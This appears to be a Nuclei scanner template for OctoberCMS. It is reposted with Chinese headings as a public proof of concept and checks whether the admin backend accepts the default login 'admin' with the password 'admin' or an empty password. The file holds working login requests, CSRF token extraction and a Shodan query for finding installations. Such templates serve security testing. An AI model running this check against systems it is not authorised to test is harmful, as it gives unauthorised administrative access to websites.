漏洞描述
OctoberCMS default admin credentials were discovered.
octobercms-default-login: OctoberCMS - Default Admin Discovery
PoC代码[已公开]
id: octobercms-default-login
info:
name: OctoberCMS - Default Admin Discovery
author: princechaddha
severity: high
description: OctoberCMS default admin credentials were discovered.
reference:
- https://github.com/octobercms/october
- https://octobercms.com/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
cpe: cpe:2.3:a:octobercms:october:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 4
shodan-query: http.component:"October CMS"
product: october
vendor: octobercms
tags: octobercms,default-login,oss,vuln
http:
- raw:
- |
GET /backend/backend/auth/signin HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
POST /backend/backend/auth/signin HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
_token={{token}}&postback=1&login={{username}}&password={{password}}
attack: clusterbomb
payloads:
username:
- admin
password:
- admin
- ""
matchers-condition: and
matchers:
- type: word
part: header
words:
- "october_session="
- "admin_auth="
condition: and
- type: status
status:
- 302
extractors:
- type: regex
part: body
name: token
internal: true
group: 1
regex:
- 'meta name="csrf\-token" content="([A-Za-z0-9]+)">'
# digest: 490a004630440220375a14905eae071a9efb6a1807d7ecc01b02edc26d0991e4e1b7b8ede5c2da24022037854dd4dd85077437bd121f87aca2ec8206f1e8effd951fe7d0cdc2928ca716:922c64590222798bb761d5b6d8e72950